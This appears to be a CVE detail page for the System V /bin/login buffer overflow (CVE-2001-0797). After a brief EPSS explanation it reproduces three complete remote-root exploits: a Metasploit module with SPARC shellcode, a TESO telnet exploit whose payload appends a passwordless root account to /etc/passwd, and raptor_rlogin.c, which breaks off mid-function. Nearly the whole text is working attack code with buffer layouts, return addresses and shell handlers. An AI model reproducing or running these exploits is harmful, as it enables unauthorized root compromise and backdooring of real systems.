CVE-2001-0797 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Dialup def initialize(info = {}) super(update_info(info, 'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow', 'Description' => %q{ This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments. }, 'References' => [ [ 'CVE', '2001-0797'], [ 'OSVDB', '690'], [ 'OSVDB', '691'], [ 'BID', '3681'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'], ], 'Version' => '$Revision: 9669 $', 'Author' => [ 'I)ruid', ], 'Arch' => ARCH_TTY, 'Platform' => ['unix'], 'License' => MSF_LICENSE, 'Payload' => { 'Space' => 3000, 'BadChars' => '', 'DisableNops' => true, }, 'Targets' => [ [ 'Solaris 2.6 - 8 (SPARC)', { 'Platform' => 'unix', 'Ret' => 0x00027184, # Solaris/SPARC special shellcode (courtesy of inode) # execve() + exit() 'Shellcode' => "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" + "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", 'NOP' => "\x90\x1b\x80\x0e", } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 12 2001')) register_options( [ # OptString.new('USER', [true, 'User to log in as', 'bin']), ], self.class) end def buildbuf print_status("Targeting: #{self.target.name}") retaddr = self.target.ret shellcode = self.target['Shellcode'] nop = self.target['NOP'] user = datastore['USER'] command = datastore['COMMAND'] + "\n" # prepare the evil buffer i = 0 buf = '' # login name buf[i,4] = 'bin ' i += 4 # return address buf[i,4] = [retaddr].pack('N') i += 4 buf[i,1] = ' ' i += 1 # trigger the overflow (0...60).each {|c| buf[i,2] = 'a ' i += 2 } # padding buf[i,4] = ' BBB' i += 4 # nop sled and shellcode (0...398).each {|c| buf[i,nop.size] = nop i += nop.size } shellcode.each_byte {|b| c = b.chr case 'c' when "\\" buf[i,2] = "\\\\" i += 2 when "\xff", "\n", " ", "\t" buf[i,1] = "\\" buf[i+1,1] = (((b & 0300) >> 6) + '0').chr buf[i+2,1] = (((b & 0070) >> 3) + '0').chr buf[i+3,1] = ( (b & 0007) + '0').chr i += 4 else buf[i,1] = c i += 1 end } # TODO: need to overwrite/skip the last byte of shellcode? #i -= 1 # padding buf[i,4] = 'BBB ' i += 4 # pam_handle_t: minimal header buf[i,16] = 'CCCCCCCCCCCCCCCC' i += 16 buf[i,4] = [retaddr].pack('N') i += 4 buf[i,4] = [0x01].pack('N') i += 4 # pam_handle_t: NULL padding (0...52).each {|c| buf[i,4] = [0].pack('N') i += 4 } # pam_handle_t: pameptr must be the 65th ptr buf[i,9] = "\x00\x00\x00 AAAA\n" i += 9 return buf end def exploit buf = buildbuf print_status("Dialing Target") if not connect_dialup print_error("Exiting.") return end print_status("Waiting for login prompt") res = dialup_expect(/ogin:\s/i, 10) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Login prompt not found... Exiting.") disconnect_dialup return end # send the evil buffer, 256 chars at a time print_status("Sending evil buffer...") #puts Rex::Text.to_hex_dump(buf) len = buf.length p = 0 while(len > 0) do i = len > 0x100 ? 0x100 : len #puts Rex::Text.to_hex_dump(buf[p,i]) dialup_puts(buf[p,i]) len -= i p += i # if len > 0 # puts Rex::Text.to_hex_dump("\x04") # dialup_puts("\x04") if len > 0 # end select(nil,nil,nil,0.5) end # wait for password prompt print_status("Waiting for password prompt") res = dialup_expect(/assword:/i, 30) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Target is likely not vulnerable... Exiting.") disconnect_dialup return end print_status("Password prompt received, waiting for shell") dialup_puts("pass\n") res = dialup_expect(/#\s/i, 20) #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Shell not found.") print_error("Target is likely not vulnerable... Exiting.") disconnect_dialup return end print_status("Success!!!") handler disconnect_dialup end end

/* * 7350963 - /bin/login remote root explot SPARC/x86 * * TESO CONFIDENTIAL - SOURCE MATERIALS * * This is unpublished proprietary source code of TESO Security. * * (C) COPYRIGHT TESO Security, 2001 * All Rights Reserved * * bug found by scut 2001/12/20 * thanks to halvar,scut,typo,random,edi,xdr. * special thanks to security.is. * * keep it private! * don't distribute! */ //#define X86_FULL_PACKAGE #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <unistd.h> #include <stdlib.h> void usage() { printf("usage: ./7350963 ip_of_the_victim\n"); } void dump_hex(char *str,char *data,int len) { int i; if(str) { printf("\n=======%s:%d========\n",str,len); } else { printf("\n=======================\n"); } for(i=0; i < len ;i++) { printf("x%.2x\n", (data[i]&0xff)); } printf("\n-----------------------\n"); for(i=0; i < len ;i++) { if(data[i]==0x00) { printf("|\n"); } else { printf("%c\n",data[i]); } } printf("\n"); fflush(stdout); } int send_data(int sock,const char *send_data,int send_len) { int wc; int rc; char recv_buf[1000]; if(send_data && send_len > 0) { wc=send(sock,send_data,send_len,0); } rc=recv(sock,recv_buf,sizeof(recv_buf),0); if(rc > 0) { dump_hex("recv",recv_buf,rc); } } int main(int argc,char *argv[]) { int sock; struct sockaddr_in address; int i; char send_data_1[]= { 0xff,0xfd,0x03, 0xff,0xfb,0x18, 0xff,0xfb,0x1f, 0xff,0xfb,0x20, 0xff,0xfb,0x21, 0xff,0xfb,0x22, 0xff,0xfb,0x27, 0xff,0xfd,0x05, 0xff,0xfb,0x23 }; char send_data_2[]= { 0xff,0xfa,0x1f,0x00,0x50,0x00,0x18, 0xff,0xf0, 0xff,0xfc,0x24 }; char send_data_3[]= { 0xff,0xfd,0x01, 0xff,0xfc,0x01 }; char str_buffer[1024*30]; int str_buffer_pos=0; char str_end[2]={0xd,0x0}; char *env_str; int env_str_len; char env_1[4]={0xff,0xfa,0x18,0x00}; char *terminal_name="xterm-debian"; char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00}; char *display="matter:0.0"; char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00}; char *display_var="DISPlAY"; char display_delimiter[1]={0x01}; char *display_value="matter:0.0"; char *environ_str; int environ_str_len; int env_cur_pos=0; int env_num; char env_4[2]={0xff,0xf0}; char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n"; char login_buffer[]= "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\ ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\ ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\ ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\ ji41=E ji42=A ji43=A ji44=e j"; char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test $0x1,%dl¸¦ ³Ñ±â±â À§Çؼ­ char login_buffer1[]="=A j"; #ifdef X86_FULL_PACKAGE char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08}; #else char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08}; #endif char t_delete_edi_plus_0xa[]="=A j"; char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff}; char login_buffer1_0[]="=A ji48=A j "; #ifdef X86_FULL_PACKAGE char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08}; #else char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08}; #endif char login_buffer1_1[]="=\\\r\n\ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58="; #ifdef X86_FULL_PACKAGE char t_delete2_param1[]={0x29,0x80,0x06,0x08}; #else char t_delete2_param1[]={0x21,0x80,0x06,0x08}; #endif char login_buffer1_2[]="6=8"; char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff}; //ù¹ø° A -1 ÀÓ char login_buffer2[]="A=AB"; // 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS //0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 <strncpy> //(gdb) print/x 0x80655a4 - 0x20 //$1 = 0x8065584 #ifdef X86_FULL_PACKAGE char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx #else char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx #endif char login_buffer2_0[]="GHIJ"; char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff}; char login_buffer2_1[]="OPQRSTUVWXYZ"; //0x806810d <inputline+780>: 'A' <repeats 82 times>, "\n" #ifdef X86_FULL_PACKAGE char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax #else char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax #endif //0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhfoiew char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\ jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A jw21=B jy"; //31=A z";//4=A k2=A k3=A k"; #ifdef X86_FULL_PACKAGE //char strncpy_src[]={0xf9,0x3b,0x05,0x08}; char strncpy_src[]={0x31,0x80,0x06,0x08}; #else char strncpy_src[]={0xf1,0x3b,0x05,0x08}; #endif char env_buffer[]="hi1=A hi2=A hi3=A hi"; char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48 char env_buffer0[]="hi5=A hi6=A hi7=A hi"; #ifdef X86_FULL_PACKAGE char free_dest_buffer[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer[]={0x29,0x80,0x06,0x08}; #endif char env_buffer2[]="zi9="; #ifdef X86_FULL_PACKAGE char free_dest_buffer2[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer2[]={0x29,0x80,0x06,0x08}; #endif char exp_buffer0[]="hello"; char jmp_code[]={0xeb,0xc}; char exp_buffer1[]="\\\r\nhhhhhhhhhhh"; char shellcode[]= { 0xeb,0x1d, 0x5e, /*popl %esi*/ 0x33,0xc0, /*xorl %eax,%eax*/ 0x50, /*pushl %eax - ,0x0*/ #ifdef X86_FULL_PACKAGE 0x68,0x46,0x81,0x06,0x08, 0x68,0x43,0x81,0x06,0x08, 0x68,0x40,0x81,0x06,0x08, 0x68,0x38,0x81,0x06,0x08, #else 0x68,0x3e,0x81,0x06,0x08, 0x68,0x3b,0x81,0x06,0x08, 0x68,0x38,0x81,0x06,0x08, 0x68,0x30,0x81,0x06,0x08, #endif #ifdef X86_FULL_PACKAGE 0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/ #else 0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/ #endif 0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/ }; char exec_argv0[]="/bin/sh"; char exec_argv1[]="sh"; char exec_argv2[]="-c"; char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;"; //"/bin/echo met::11652::::::>>/etc/shadow;"; //"/bin/finger @210.111.69.137"; //211.59.123.155"; char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n"; #ifdef X86_FULL_PACKAGE char free_dest_buffer3[]={0x31,0x80,0x06,0x08}; #else char free_dest_buffer3[]={0x29,0x80,0x06,0x08}; #endif char env_buffer5[]="70=b \\\r\n\hr371=b hs372="; char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08}; char env_buffer5_0[]="473="; char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa Àӽú¯Åë char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8 display=""; terminal_name=""; if (argc < 2) { usage(); exit(-1); } env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display) + sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter) + strlen(display_value) + sizeof(env_4); env_str=(char *)calloc(1,env_str_len); if(env_str) { env_cur_pos=0; memcpy(env_str+env_cur_pos,env_1,sizeof(env_1)); env_cur_pos += sizeof(env_1); memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name)); env_cur_pos += strlen(terminal_name); memcpy(env_str + env_cur_pos,env_2,sizeof(env_2)); env_cur_pos += sizeof(env_2); memcpy(env_str + env_cur_pos,display,strlen(display)); env_cur_pos += strlen(display); memcpy(env_str + env_cur_pos,env_3,sizeof(env_3)); env_cur_pos += sizeof(env_3); memcpy(env_str + env_cur_pos,display_var,strlen(display_var)); env_cur_pos += strlen(display_var); memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delimiter)); env_cur_pos+=sizeof(display_delimiter); memcpy(env_str + env_cur_pos,display_value,strlen(display_value)); env_cur_pos += strlen(display_value); memcpy(env_str + env_cur_pos,env_4,sizeof(env_4)); env_cur_pos += sizeof(env_4); } /*socket operation*/ sock=socket(AF_INET,SOCK_STREAM,0); if(sock < 0) { perror("socket"); return -1; } address.sin_family=AF_INET; address.sin_port=htons(23); //inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists address.sin_addr.s_addr=inet_addr(argv[1]); if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0) { perror("connect"); return -1; } send_data(sock,NULL,0); send_data(sock,send_data_1,sizeof(send_data_1)); send_data(sock,send_data_2,sizeof(send_data_2)); //dump_hex("env",env_str,env_cur_pos); send_data(sock,env_str,env_cur_pos); free(env_str); send_data(sock,send_data_3,sizeof(send_data_3)); str_buffer_pos=0; memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffer)); str_buffer_pos += strlen(exploit_buffer); strcpy(str_buffer + str_buffer_pos,login_buffer); str_buffer_pos += strlen(login_buffer); memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx)); str_buffer_pos += sizeof(realfree_edx); strcpy(str_buffer + str_buffer_pos,login_buffer1); str_buffer_pos += strlen(login_buffer1); memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_delete_edi_plus_0x8)); str_buffer_pos += sizeof(t_delete_edi_plus_0x8); memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_delete_edi_plus_0xa)); str_buffer_pos += strlen(t_delete_edi_plus_0xa); memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_delete_edi_plus_0x10)); str_buffer_pos += sizeof(t_delete_edi_plus_0x10); strcpy(str_buffer + str_buffer_pos,login_buffer1_0); str_buffer_pos += strlen(login_buffer1_0); memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_delete_edi_plus_0x20)); str_buffer_pos += sizeof(t_delete_edi_plus_0x20); strcpy(str_buffer + str_buffer_pos,login_buffer1_1); str_buffer_pos += strlen(login_buffer1_1); memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_param1)); str_buffer_pos += sizeof(t_delete2_param1); strcpy(str_buffer + str_buffer_pos,login_buffer1_2); str_buffer_pos += strlen(login_buffer1_2); memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos)); str_buffer_pos += sizeof(link_pos); strcpy(str_buffer + str_buffer_pos,login_buffer2); str_buffer_pos += strlen(login_buffer2); memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_delete2_edi_plus_0x8)); str_buffer_pos += sizeof(t_delete2_edi_plus_0x8); strcpy(str_buffer + str_buffer_pos,login_buffer2_0); str_buffer_pos += strlen(login_buffer2_0); memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_delete2_edi_plus_0x10)); str_buffer_pos += sizeof(t_delete2_edi_plus_0x10); strcpy(str_buffer + str_buffer_pos,login_buffer2_1); str_buffer_pos += strlen(login_buffer2_1); memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_delete2_edi_plus_0x20)); str_buffer_pos += sizeof(t_delete2_edi_plus_0x20); strcpy(str_buffer + str_buffer_pos,login_buffer2_2); str_buffer_pos += strlen(login_buffer2_2); memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src)); str_buffer_pos += sizeof(strncpy_src); memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer)); str_buffer_pos += strlen(env_buffer); memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_input_output_eax)); str_buffer_pos += sizeof(pam_input_output_eax); memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0)); str_buffer_pos += strlen(env_buffer0); memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_buffer)); str_buffer_pos += sizeof(free_dest_buffer); memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2)); str_buffer_pos += strlen(env_buffer2); memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_buffer2)); str_buffer_pos += sizeof(free_dest_buffer2); strcpy(str_buffer + str_buffer_pos,exp_buffer0); str_buffer_pos += strlen(exp_buffer0); memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code)); str_buffer_pos += sizeof(jmp_code); strcpy(str_buffer + str_buffer_pos,exp_buffer1); str_buffer_pos += strlen(exp_buffer1); memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode)); str_buffer_pos += sizeof(shellcode); strcpy(str_buffer + str_buffer_pos,exec_argv0); str_buffer_pos += strlen(exec_argv0)+1; strcpy(str_buffer + str_buffer_pos,exec_argv1); str_buffer_pos += strlen(exec_argv1)+1; strcpy(str_buffer + str_buffer_pos,exec_argv2); str_buffer_pos += strlen(exec_argv2)+1; strcpy(str_buffer + str_buffer_pos,exec_argv3); str_buffer_pos += strlen(exec_argv3)+1; memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end)); str_buffer_pos += strlen(str_end); { char buf[100]; fgets(buf,100,stdin); } printf("sending login!\n"); fflush(stdout); send_data(sock,str_buffer,str_buffer_pos); send_data(sock,NULL,0); printf("\n\n\npress return to send password\n..."); { char buf[100]; fgets(buf,100,stdin); } send_data(sock,str_buffer,strlen(str_buffer)+1); printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n"); fflush(stdout); sleep(30); return 42; } // milw0rm.com [2001-12-20]

/* * $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ * * raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8 * Copyright (c) 2004 Marco Ivaldi <[email protected]> * * Buffer overflow in login in various System V based operating systems * allows remote attackers to execute arbitrary commands via a large number * of arguments through services such as telnet and rlogin (CVE-2001-0797). * * Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004 * * This remote root exploit uses the (old) System V based /bin/login * vulnerability via the rlogin attack vector, returning into the .bss * section to effectively bypass the non-executable stack protection * (noexec_user_stack=1 in /etc/system). * * Many thanks to scut <[email protected]> (0dd) for his elite pam_handle_t * technique (see 7350logout.c), also thanks to inode <[email protected]>. * * Usage (must be root): * # gcc raptor_rlogin.c -o raptor_rlogin -Wall * [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet] * # ./raptor_rlogin -h 192.168.0.50 * [...] * # id;uname -a;uptime; * uid=0(root) gid=0(root) * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10 * 7:45pm up 12 day(s), 18:42, 1 user, load average: 0.00, 0.00, 0.01 * # * * Vulnerable platforms (SPARC): * Solaris 2.5.1 without patch 106160-02 [untested] * Solaris 2.6 without patch 105665-04 [untested] * Solaris 7 without patch 112300-01 [untested] * Solaris 8 without patch 111085-02 [tested] */ #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define INFO1 "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8" #define INFO2 "Copyright (c) 2004 Marco Ivaldi <[email protected]>" #define BUFSIZE 3000 // max size of the evil buffer #define RETADDR 0x27184 // retaddr, should be reliable #define TIMEOUT 10 // net_read() default timeout #define CMD "id;uname -a;uptime;\n" // executed upon exploitation char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */ /* execve() + exit() */ "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"; char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */ "\x90\x1b\x80\x0e"; /* prototypes */ int exploit_addchar(unsigned char *ww, unsigned char wc); void fatalerr(char *func, char *error, int fd); int net_connect(char *host, int port, int timeout); int net_read(int fd, char *buf, int size, int timeout); int net_resolve(char *host); int sc_copy(unsigned char *buf, char *str, long len); void set_val(char *buf, int pos, int val); void shell(int fd); void usage(char *progname); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], *p = buf; char c, *host = NULL, term[] = "vt100/9600"; int fd, i, found, len; int timeout = TIMEOUT, debug = 0; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* parse command line */ if (argc < 2) usage(argv[0]); while ((c = getopt(argc, argv, "dh:t:")) != EOF) switch(c) { case 'h': host = optarg; break; case 't': timeout = atoi(optarg); break; case 'd': debug = 1; break; default: usage(argv[0]); } if (!host) usage(argv[0]); /* connect to the target host */ fd = net_connect(host, 513, 10); fprintf(stderr, "# connected to remote host: %s\n", host); /* signal handling */ signal(SIGPIPE, SIG_IGN); /* begin the rlogin session */ memset(buf, 0, sizeof(buf)); if (send(fd, buf, 1, 0) < 0) fatalerr("send", strerror(errno), fd); if (net_read(fd, buf, sizeof(buf), timeout) < 0) fatalerr("error", "Timeout reached in rlogin session", fd); /* dummy rlogin authentication */ memcpy(p, "foo", 3); // local login name p += 4; memcpy(p, "bar", 3); // remote login name p += 4; memcpy(p, term, sizeof(term)); // terminal type p += sizeof(term); fprintf(stderr, "# performing dummy rlogin authentication\n"); if (send(fd, buf, p - buf, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for password prompt */ found = 0; memset(buf, 0, sizeof(buf)); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "assword: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Timeout waiting for password prompt", fd); /* send a dummy password */ if (send(fd, "pass\n", 5, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for login prompt */ found = 0; memset(buf, 0, sizeof(buf)); fprintf(stderr, "# waiting for login prompt\n"); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "ogin: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Timeout waiting for login prompt", fd); fprintf(stderr, "# returning into 0x%08x\n", RETADDR); /* for debugging purposes */ if (debug) { printf("# debug: press enter to continue"); scanf("%c", &c); } /* prepare the evil buffer */ memset(buf, 0, sizeof(buf)); p = buf; /* login name */ memcpy(p, "foo ", 4); p += 4; /* return address (env) */ set_val(p, 0, RETADDR); p += 4; memcpy(p, " ", 1); p++; /* trigger the overflow (env) */ for (i = 0; i < 60; i++, p += 2) memcpy(p, "a ", 2); /* padding */ memcpy(p, " BBB", 4); p += 4; /* nop sled and shellcode */ for (i = 0; i < 398; i++, p += 4) memcpy(p, sparc_nop, 4); p += sc_copy(p, sc, sizeof(sc) - 1); /* padding */ memcpy(p, "BBB ", 4); p += 4; /* pam_handle_t: minimal header */ memcpy(p, "CCCCCCCCCCCCCCCC", 16); p += 16; set_val(p, 0, RETADDR); // must be a valid address p += 4; set_val(p, 0, 0x01); p += 4; /* pam_handle_t: NULL padding */ for (i = 0; i < 52; i++, p += 4) set_val(p, 0, 0x00); /* pam_handle_t: pameptr must be the 65th ptr */ memcpy(p, "\x00\x00\x00 AAAA\n", 9); p += 9; /* send the evil buffer, 256 chars a time */ len = p - buf; p = buf; while (len > 0) { fprintf(stderr, "#"); i = len > 0x100 ? 0x100 : len; send(fd, p, i, 0); len -= i; p += i; if (len) send(fd, "\x04", 1, 0); usleep(500000); } fprintf(stderr, "\n"); /* wait for password prompt */ found = 0; memset(buf, 0, sizeof(buf)); fprintf(stderr, "# evil buffer sent, waiting for password prompt\n"); while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "assword: ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Most likely not vulnerable", fd); fprintf(stderr, "# password prompt received, waiting for shell\n"); if (send(fd, "pass\n", 5, 0) < 0) fatalerr("send", strerror(errno), fd); /* wait for shell prompt */ memset(buf, 0, sizeof(buf)); found = 0; while (net_read(fd, buf, sizeof(buf), timeout)) { if (strstr(buf, "# ") != NULL) { found = 1; break; } memset(buf, 0, sizeof(buf)); } if (!found) fatalerr("error", "Most likely not vulnerable", fd); /* connect to the remote shell */ fprintf(stderr, "# shell prompt detected, successful exploitation\n\n"); shell(fd); exit(0); } /* * exploit_addchar(): char translation for pam (ripped from scut) */ int exploit_addchar(unsigned char *ww, unsigned char wc) { unsigned char * wwo = ww; switch (wc) { case ('\\'): *ww++ = '\\'; *ww++ = '\\'; break; case (0xff): case ('\n'): case (' '): case ('\t'): *ww++ = '\\'; *ww++ = ((wc & 0300) >> 6) + '0'; *ww++ = ((wc & 0070) >> 3) + '0'; *ww++ = (wc & 0007) + '0'; break; default: *ww++ = wc; break; } return (ww - wwo); } /* * fatalerr(): error handling routine */ void fatalerr(char *func, char *error, int fd) { fprintf(stderr, "%s: %s\n", func, error); close(fd); exit(1); } /* * net_connect(): simple network connect with timeout */ int net_connect(char *host, int port, int timeout) { int fd, i, flags, sock_len; struct sockaddr_in sin; struct timeval tv; fd_set fds; /* allocate a socket */ if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket"); exit(1); } /* bind a privileged port (FIXME) */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = htonl(INADDR_ANY); for (i = 1023; i > 0; i--) { sin.sin_port = htons(i); if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin)))) break; } if (i == 0) fatalerr("error", "Can't bind a privileged port (must be root)", fd); /* resolve the peer address */ sin.sin_port = htons(port); if (!(sin.sin_addr.s_addr = net_resolve(host))) fatalerr("error", "Can't resolve hostname", fd); /* set non-blocking */ if ((flags = fcntl(fd, F_GETFL, 0)) < 0) fatalerr("fcntl", strerror(errno), fd); if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) fatalerr("fcntl", strerror(errno), fd); /* connect to remote host */ if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) { if (fcntl(fd, F_SETFL, flags) < 0) fatalerr("fcntl", strerror(errno), fd); return(fd); } if (errno != EINPROGRESS) fatalerr("error", "Can't connect to remote host", fd); /* set timeout */ tv.tv_sec = timeout; tv.tv_usec = 0; /* setup select structs */ FD_ZERO(&fds); FD_SET(fd, &fds); /* select */ if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0) fatalerr("error", "Can't connect to remote host", fd); /* check if connected */ sock_len = sizeof(sin); if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0) fatalerr("error", "Can't connect to remote host", fd); if (fcntl(fd, F_SETFL, flags) < 0) fatalerr("fcntl", strerror(errno), fd); return(fd); } /* * net_read(): non-blocking read from fd */ int net_read(int fd, char *buf, int size, int timeout) { fd_set fds; struct timeval wait; int n = -1; /* set timeout */ wait.tv_sec = timeout; wait.tv_usec = 0; memset(buf, 0, size); FD_ZERO(&fds); FD_SET(fd, &fds); /* select with timeout */ if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) { perror("select"); exit(1); } /* read data if any */ if (FD_ISSET(fd, &fds)) n = 